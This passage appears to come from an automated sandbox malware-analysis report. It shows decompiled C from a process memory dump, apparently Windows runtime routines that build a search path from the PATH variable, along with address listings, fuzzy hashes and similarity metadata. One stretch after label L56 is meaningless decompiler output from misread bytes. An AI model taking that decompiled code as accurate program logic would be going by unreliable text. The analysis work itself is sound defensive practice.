							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xbc8628; // 0x0
							_t116 =  *0xbc862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                            0x00afb94c
                                                                                                            0x00afb956
                                                                                                            0x00afb95c
                                                                                                            0x00afb95e
                                                                                                            0x00afb964
                                                                                                            0x00afb969
                                                                                                            0x00afb96d
                                                                                                            0x00afb96d
                                                                                                            0x00afb970
                                                                                                            0x00afb974
                                                                                                            0x00afb97a
                                                                                                            0x00afbadf
                                                                                                            0x00afbadf
                                                                                                            0x00afbae2
                                                                                                            0x00afbae4
                                                                                                            0x00afbae6
                                                                                                            0x00afbaf0
                                                                                                            0x00b42cb8
                                                                                                            0x00afbaf6
                                                                                                            0x00afbaf6
                                                                                                            0x00afbaf6
                                                                                                            0x00afbafd
                                                                                                            0x00afbb1f
                                                                                                            0x00afbb1f
                                                                                                            0x00afbaff
                                                                                                            0x00afbb00
                                                                                                            0x00afbb00
                                                                                                            0x00afbb03
                                                                                                            0x00afbb03
                                                                                                            0x00afbacb
                                                                                                            0x00afbacf
                                                                                                            0x00afbad0
                                                                                                            0x00afbad1
                                                                                                            0x00afbadc
                                                                                                            0x00afbadc
                                                                                                            0x00afb980
                                                                                                            0x00afb980
                                                                                                            0x00afb988
                                                                                                            0x00afb98b
                                                                                                            0x00afb98d
                                                                                                            0x00afb990
                                                                                                            0x00afb993
                                                                                                            0x00afb999
                                                                                                            0x00afb99b
                                                                                                            0x00afb9a1
                                                                                                            0x00afb9a5
                                                                                                            0x00afb9aa
                                                                                                            0x00afb9b0
                                                                                                            0x00afb9bb
                                                                                                            0x00afb9c0
                                                                                                            0x00afb9c3
                                                                                                            0x00afb9ca
                                                                                                            0x00afb9cc
                                                                                                            0x00afb9cf
                                                                                                            0x00afb9d3
                                                                                                            0x00afb9d7
                                                                                                            0x00afba94
                                                                                                            0x00afba94
                                                                                                            0x00afba98
                                                                                                            0x00afbaa3
                                                                                                            0x00b42ccb
                                                                                                            0x00afbaa9
                                                                                                            0x00afbaa9
                                                                                                            0x00afbaa9
                                                                                                            0x00afbab1
                                                                                                            0x00b42cd5
                                                                                                            0x00b42cdd
                                                                                                            0x00b42cdd
                                                                                                            0x00afbabb
                                                                                                            0x00afbabc
                                                                                                            0x00afbac2
                                                                                                            0x00afbac3
                                                                                                            0x00afbac3
                                                                                                            0x00afbac6
                                                                                                            0x00000000
                                                                                                            0x00afb9dd
                                                                                                            0x00afb9dd
                                                                                                            0x00afb9e7
                                                                                                            0x00afb9e7
                                                                                                            0x00afb9ec
                                                                                                            0x00afb9ec
                                                                                                            0x00afb9f1
                                                                                                            0x00afb9f5
                                                                                                            0x00afb9fa
                                                                                                            0x00afba00
                                                                                                            0x00afba0c
                                                                                                            0x00afba10
                                                                                                            0x00afba10
                                                                                                            0x00afba12
                                                                                                            0x00afba18
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00afbb26
                                                                                                            0x00afbb26
                                                                                                            0x00afba1e
                                                                                                            0x00afba1e
                                                                                                            0x00afba23
                                                                                                            0x00afba25
                                                                                                            0x00afba2c
                                                                                                            0x00afba30
                                                                                                            0x00afba35
                                                                                                            0x00afba35
                                                                                                            0x00afba41
                                                                                                            0x00afba46
                                                                                                            0x00afba4c
                                                                                                            0x00afba50
                                                                                                            0x00afba54
                                                                                                            0x00afba6a
                                                                                                            0x00afba6e
                                                                                                            0x00afba70
                                                                                                            0x00afba74
                                                                                                            0x00afba78
                                                                                                            0x00afba7a
                                                                                                            0x00afba7c
                                                                                                            0x00afba8e
                                                                                                            0x00afba90
                                                                                                            0x00afba92
                                                                                                            0x00afbb14
                                                                                                            0x00afbb14
                                                                                                            0x00afbb16
                                                                                                            0x00afbb16
                                                                                                            0x00000000
                                                                                                            0x00afba7c
                                                                                                            0x00afbb0a
                                                                                                            0x00afbb0d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00afbb0f

                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AFB9A5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 885266447-0
                                                                                                            • Opcode ID: 5b110a4de408db45021610652e9d8cd0dcd6d880ac74fbe75fdc8129fb1647c8
                                                                                                            • Instruction ID: 63339437945b02cb1a5e8099c50a8c65e0a63b0860f7dee0561d2f502d16ff17
                                                                                                            • Opcode Fuzzy Hash: 5b110a4de408db45021610652e9d8cd0dcd6d880ac74fbe75fdc8129fb1647c8
                                                                                                            • Instruction Fuzzy Hash: 10512471A18344CFC720DF69C48092ABBF5FB88750F64896EF69587255DB70E844CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B02581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E00B02581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1546911916) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				void* _t248;
				signed int _t254;
				signed int _t256;
				intOrPtr _t258;
				signed int _t261;
				signed int _t268;
				signed int _t271;
				signed int _t279;
				signed int _t281;
				signed int _t286;
				signed int _t288;
				void* _t290;
				signed int _t291;
				unsigned int _t294;
				signed int _t298;
				void* _t299;
				signed int _t300;
				signed int _t304;
				void* _t315;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t337;
				signed int _t339;
				signed int _t341;
				void* _t342;
				void* _t344;

				_t339 = _t341;
				_t342 = _t341 - 0x4c;
				_v8 =  *0xbcd360 ^ _t339;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0xbcb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t294 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t286 = 0x48;
				_t314 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t326 = 0;
				_v37 = _t314;
				if(_v48 <= 0) {
					L16:
					_t45 = _t286 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L00AF4620(_t294,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t286);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t314 = _v32;
							 *(_t333 + 0x3c) = _t286;
							_t288 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t314;
							if(_t314 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t314 - 0xbc8478;
								 *_t333 = ((0 | _t314 == 0x00bc8478) - 0x00000001 & 0xfffffffb) + 7;
								E00B1F3E0(_t328,  *((intOrPtr*)(_t314 + 4)),  *_t314 & 0x0000ffff);
								_t314 = _v32;
								_t342 = _t342 + 0xc;
								_t288 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t314 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t279 = E00B639F2(_t328);
									_t314 = _v32;
									_t328 = _t279;
								}
							}
							_t298 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t286 = _t333 + _t288 * 4;
								_v56 = _t286;
								do {
									__eflags = _t314;
									if(_t314 != 0) {
										_t240 =  *(_v60 + _t298 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t286 =  *(_v60 + _t298 * 4);
										 *(_t286 + 0x18) = _t328;
										_t244 =  *(_v60 + _t298 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M00B02959))) {
												case 0:
													__ax =  *0xbc8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00B1F3E0(__edi,  *0xbc848c, __ax & 0x0000ffff);
														__eax =  *0xbc8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00B1F3E0(_t328, _v80, _v64);
													_t274 = _v64;
													goto L26;
												case 2:
													 *0xbc8480 & 0x0000ffff = E00B1F3E0(__edi,  *0xbc8484,  *0xbc8480 & 0x0000ffff);
													__eax =  *0xbc8480 & 0x0000ffff;
													__eax = ( *0xbc8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00B1F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00B1F3E0(_t328, _v76, _v36);
														_t274 = _v36;
													}
													L26:
													_t342 = _t342 + 0xc;
													_t328 = _t328 + (_t274 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t276);
													 *((short*)(_t328 - 2)) = _t276;
													goto L28;
												case 6:
													__ebx =  *0xbc575c;
													__eflags = __ebx - 0xbc575c;
													if(__ebx != 0xbc575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00B1F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xbc575c;
														} while (__ebx != 0xbc575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xbc8478 & 0x0000ffff = E00B1F3E0(__edi,  *0xbc847c,  *0xbc8478 & 0x0000ffff);
													__eax =  *0xbc8478 & 0x0000ffff;
													__eax = ( *0xbc8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00B639F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xbc6e58 & 0x0000ffff = E00B1F3E0(__edi,  *0xbc6e5c,  *0xbc6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xbc6e58 & 0x0000ffff;
													__eax = ( *0xbc6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t298 = _v16;
													_t314 = _v32;
													L29:
													_t286 = _t286 + 4;
													__eflags = _t286;
													_v56 = _t286;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t298 = _t298 + 1;
									_v16 = _t298;
									__eflags = _t298 - _v48;
								} while (_t298 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t281 =  *(_v60 + _t326 * 4);
						if(_t281 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t281 * 4 +  &M00B02935))) {
							case 0:
								__ax =  *0xbc8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t314 =  &_v64;
								_v80 = E00B02E3E(0,  &_v64);
								_t286 = _t286 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xbc8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xbc8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00AEEEF0(0xbc79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00AEEB70(__ecx, 0xbc79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t294 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xbc7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00AF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00AEEB70(__ecx, 0xbc79a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t339;
										_pop(_t287);
										return E00B1B640(_t219, _t287, _v8 ^ _t339, _t314, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t282 = _v56;
								if(_v56 != 0) {
									_t314 =  &_v36;
									_t284 = E00B02E3E(_t282,  &_v36);
									_t294 = _v36;
									_v76 = _t284;
								}
								if(_t294 == 0) {
									goto L44;
								} else {
									_t286 = _t286 + 2 + _t294;
								}
								goto L14;
							case 6:
								__eax =  *0xbc5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xbc8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xbc8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xbc6e58 & 0x0000ffff;
								__eax = ( *0xbc6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t314 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t299 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("o16 sub [eax-0x4fd82000], dh");
					 *_t333 =  *_t333 + _t299;
					_t336 = _t333 + 1;
					 *0xFFFFFFFFB0260500 =  *((intOrPtr*)(0xffffffffb0260500)) - _t314;
					 *_t328 =  *_t328 + _t286;
					_pop(_t290);
					_t248 = _t342;
					_t344 = 0;
					 *((intOrPtr*)(_t248 - 0x4ba4cb00)) =  *((intOrPtr*)(_t248 - 0x4ba4cb00)) - _t314;
					 *_t314 =  *_t314 + _t248;
					 *((intOrPtr*)(_t248 - 0x4fd78000)) =  *((intOrPtr*)(_t248 - 0x4fd78000)) - _t333 + 1;
					_t315 = _t314 + _t314;
					asm("daa");
					_push(ds);
					 *0xFFFFFFFFB0284E00 =  *((intOrPtr*)(0xffffffffb0284e00)) - _t315;
					_a35 = _a35 + _t290;
					asm("fcomp dword [ebx-0x4c]");
					 *((intOrPtr*)(0 +  &_a1546911916)) =  *((intOrPtr*)(0 +  &_a1546911916)) + _t315;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xbaff00);
					E00B2D08C(_t290, _t328, _t336);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t291 = _a12;
					__eflags = _t291;
					if(_t291 == 0) {
						_t254 = 0xc0000100;
					} else {
						_v8 = 0;
						_t337 = 0xc0000100;
						_v52 = 0xc0000100;
						_t256 = 4;
						while(1) {
							_v40 = _t256;
							__eflags = _t256;
							if(_t256 == 0) {
								break;
							}
							_t304 = _t256 * 0xc;
							_v48 = _t304;
							__eflags = _t291 -  *((intOrPtr*)(_t304 + 0xab1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t271 = E00B1E5C0(_a8,  *((intOrPtr*)(_t304 + 0xab1668)), _t291);
									_t344 = _t344 + 0xc;
									__eflags = _t271;
									if(__eflags == 0) {
										_t337 = E00B551BE(_t291,  *((intOrPtr*)(_v48 + 0xab166c)), _a16, _t329, _t337, __eflags, _a20, _a24);
										_v52 = _t337;
										break;
									} else {
										_t256 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t256 = _t256 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t337;
						__eflags = _t337;
						if(_t337 < 0) {
							__eflags = _t337 - 0xc0000100;
							if(_t337 == 0xc0000100) {
								_t300 = _a4;
								__eflags = _t300;
								if(_t300 != 0) {
									_v36 = _t300;
									__eflags =  *_t300 - _t329;
									if( *_t300 == _t329) {
										_t337 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t258 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t300;
										if( *((intOrPtr*)(_t258 + 0x48)) == _t300) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t337 = E00B02AE4( &_v36, _a8, _t291, _a16, _a20, _a24);
												_v32 = _t337;
												__eflags = _t337 - 0xc0000100;
												if(_t337 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t300 = _v36;
													goto L75;
												}
											} else {
												_t261 = E00AE6600( *(_t317 + 0x1c));
												__eflags = _t261;
												if(_t261 != 0) {
													goto L106;
												} else {
													_t300 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t337 = E00B02C50(_t300, _a8, _t291, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t337;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00AEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t337 = _a24;
									_t268 = E00B02AE4( &_v36, _a8, _t291, _a16, _a20, _t337);
									_v32 = _t268;
									__eflags = _t268 - 0xc0000100;
									if(_t268 == 0xc0000100) {
										_v32 = E00B02C50(_v36, _a8, _t291, _a16, _a20, _t337, 1);
									}
									_v8 = _t329;
									E00B02ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t254 = _t337;
					}
					L70:
					return E00B2D0D1(_t254);
				}
				L108:
			}





















































                                                                                                            0x00b02584
                                                                                                            0x00b02586
                                                                                                            0x00b02590
                                                                                                            0x00b02596
                                                                                                            0x00b02597
                                                                                                            0x00b02598
                                                                                                            0x00b02599
                                                                                                            0x00b0259e
                                                                                                            0x00b025a4
                                                                                                            0x00b025a9
                                                                                                            0x00b025ac
                                                                                                            0x00b025ae
                                                                                                            0x00b025b1
                                                                                                            0x00b025b2
                                                                                                            0x00b025b5
                                                                                                            0x00b025b8
                                                                                                            0x00b025bb
                                                                                                            0x00b025bc
                                                                                                            0x00b025bf
                                                                                                            0x00b025c2
                                                                                                            0x00b025c5
                                                                                                            0x00b025c6
                                                                                                            0x00b025cb
                                                                                                            0x00b025ce
                                                                                                            0x00b025d8
                                                                                                            0x00b025dd
                                                                                                            0x00b025de
                                                                                                            0x00b025e1
                                                                                                            0x00b025e3
                                                                                                            0x00b025e9
                                                                                                            0x00b026da
                                                                                                            0x00b026da
                                                                                                            0x00b026dd
                                                                                                            0x00b026e2
                                                                                                            0x00b45b56
                                                                                                            0x00000000
                                                                                                            0x00b026e8
                                                                                                            0x00b026f9
                                                                                                            0x00b026fb
                                                                                                            0x00b026fe
                                                                                                            0x00b02700
                                                                                                            0x00b45b60
                                                                                                            0x00000000
                                                                                                            0x00b02706
                                                                                                            0x00b02706
                                                                                                            0x00b0270a
                                                                                                            0x00b0270a
                                                                                                            0x00b0270d
                                                                                                            0x00b02713
                                                                                                            0x00b02716
                                                                                                            0x00b02718
                                                                                                            0x00b0271c
                                                                                                            0x00b0271e
                                                                                                            0x00b45b6c
                                                                                                            0x00b45b6f
                                                                                                            0x00b45b7f
                                                                                                            0x00b45b89
                                                                                                            0x00b45b8e
                                                                                                            0x00b45b93
                                                                                                            0x00b45b96
                                                                                                            0x00b45b9c
                                                                                                            0x00b45ba0
                                                                                                            0x00b45ba3
                                                                                                            0x00b45bab
                                                                                                            0x00b45bb0
                                                                                                            0x00b45bb3
                                                                                                            0x00b45bb3
                                                                                                            0x00b45ba3
                                                                                                            0x00b02724
                                                                                                            0x00b02726
                                                                                                            0x00b02729
                                                                                                            0x00b0272c
                                                                                                            0x00b0279d
                                                                                                            0x00b0279d
                                                                                                            0x00b027a0
                                                                                                            0x00b027a2
                                                                                                            0x00000000
                                                                                                            0x00b0272e
                                                                                                            0x00b0272e
                                                                                                            0x00b02731
                                                                                                            0x00b02734
                                                                                                            0x00b02734
                                                                                                            0x00b02736
                                                                                                            0x00b45bc1
                                                                                                            0x00b45bc1
                                                                                                            0x00b45bc4
                                                                                                            0x00000000
                                                                                                            0x00b45bca
                                                                                                            0x00b45bca
                                                                                                            0x00b45bcd
                                                                                                            0x00000000
                                                                                                            0x00b45bd3
                                                                                                            0x00000000
                                                                                                            0x00b45bd3
                                                                                                            0x00b45bcd
                                                                                                            0x00b0273c
                                                                                                            0x00b0273c
                                                                                                            0x00b02742
                                                                                                            0x00b02747
                                                                                                            0x00b0274a
                                                                                                            0x00b0274d
                                                                                                            0x00b02750
                                                                                                            0x00000000
                                                                                                            0x00b02756
                                                                                                            0x00b02756
                                                                                                            0x00000000
                                                                                                            0x00b02902
                                                                                                            0x00b02908
                                                                                                            0x00b0290b
                                                                                                            0x00000000
                                                                                                            0x00b02911
                                                                                                            0x00b0291c
                                                                                                            0x00b02921
                                                                                                            0x00000000
                                                                                                            0x00b02921
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b02880
                                                                                                            0x00b02887
                                                                                                            0x00b0288c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b02805
                                                                                                            0x00b0280a
                                                                                                            0x00b02814
                                                                                                            0x00b02816
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b0281e
                                                                                                            0x00b02821
                                                                                                            0x00b02823
                                                                                                            0x00000000
                                                                                                            0x00b02829
                                                                                                            0x00b02829
                                                                                                            0x00b02831
                                                                                                            0x00b0283c
                                                                                                            0x00b0283e
                                                                                                            0x00000000
                                                                                                            0x00b0283e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b0284e
                                                                                                            0x00b02850
                                                                                                            0x00b02851
                                                                                                            0x00b02854
                                                                                                            0x00b02857
                                                                                                            0x00b0285a
                                                                                                            0x00b0285c
                                                                                                            0x00b0285d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b0275d
                                                                                                            0x00b02761
                                                                                                            0x00000000
                                                                                                            0x00b02767
                                                                                                            0x00b0276e
                                                                                                            0x00b02773
                                                                                                            0x00b02773
                                                                                                            0x00b02776
                                                                                                            0x00b02778
                                                                                                            0x00b0277e
                                                                                                            0x00b0277e
                                                                                                            0x00b02781
                                                                                                            0x00b02781
                                                                                                            0x00b02783
                                                                                                            0x00b02784
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b45bd8
                                                                                                            0x00b45bde
                                                                                                            0x00b45be4
                                                                                                            0x00b45be6
                                                                                                            0x00b45be8
                                                                                                            0x00b45be9
                                                                                                            0x00b45bee
                                                                                                            0x00b45bf8
                                                                                                            0x00b45bff
                                                                                                            0x00b45c01
                                                                                                            0x00b45c04
                                                                                                            0x00b45c07
                                                                                                            0x00b45c0b
                                                                                                            0x00b45c0d
                                                                                                            0x00b45c0d
                                                                                                            0x00b45c15
                                                                                                            0x00b45c18
                                                                                                            0x00b45c1b
                                                                                                            0x00b45c1b
                                                                                                            0x00b45c1e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b028c3
                                                                                                            0x00b028c8
                                                                                                            0x00b028d2
                                                                                                            0x00b028d4
                                                                                                            0x00b028d8
                                                                                                            0x00b028db
                                                                                                            0x00b45c26
                                                                                                            0x00b45c28
                                                                                                            0x00b45c2d
                                                                                                            0x00b45c2d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b45c34
                                                                                                            0x00b45c36
                                                                                                            0x00b45c49
                                                                                                            0x00b45c4e
                                                                                                            0x00b45c54
                                                                                                            0x00b45c5b
                                                                                                            0x00b45c5d
                                                                                                            0x00b45c60
                                                                                                            0x00b02788
                                                                                                            0x00b02788
                                                                                                            0x00b0278b
                                                                                                            0x00b0278e
                                                                                                            0x00b0278e
                                                                                                            0x00b0278e
                                                                                                            0x00b02791
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b02756
                                                                                                            0x00b02750
                                                                                                            0x00000000
                                                                                                            0x00b02794
                                                                                                            0x00b02794
                                                                                                            0x00b02795
                                                                                                            0x00b02798
                                                                                                            0x00b02798
                                                                                                            0x00000000
                                                                                                            0x00b02734
                                                                                                            0x00b0272c
                                                                                                            0x00b02700
                                                                                                            0x00b025ef
                                                                                                            0x00b025ef
                                                                                                            0x00b025ef
                                                                                                            0x00b025f2
                                                                                                            0x00b025f8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b025fe
                                                                                                            0x00000000
                                                                                                            0x00b028e6
                                                                                                            0x00b028ec
                                                                                                            0x00b028ef
                                                                                                            0x00b028f5
                                                                                                            0x00b028f8
                                                                                                            0x00b028f8
                                                                                                            0x00000000
                                                                                                            0x00b028f8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b02866
                                                                                                            0x00b02866
                                                                                                            0x00b02876
                                                                                                            0x00b02879
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b027e0
                                                                                                            0x00b027e7
                                                                                                            0x00b027e9
                                                                                                            0x00b027eb
                                                                                                            0x00b45afd
                                                                                                            0x00000000
                                                                                                            0x00b45afd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b02633
                                                                                                            0x00b02638
                                                                                                            0x00b0263b
                                                                                                            0x00b0263c
                                                                                                            0x00b0263e
                                                                                                            0x00b02640
                                                                                                            0x00b02642
                                                                                                            0x00b02647
                                                                                                            0x00b02649
                                                                                                            0x00b0264e
                                                                                                            0x00b02650
                                                                                                            0x00b02653
                                                                                                            0x00b02659
                                                                                                            0x00b026a2
                                                                                                            0x00b026a7
                                                                                                            0x00b026ac
                                                                                                            0x00b026b2
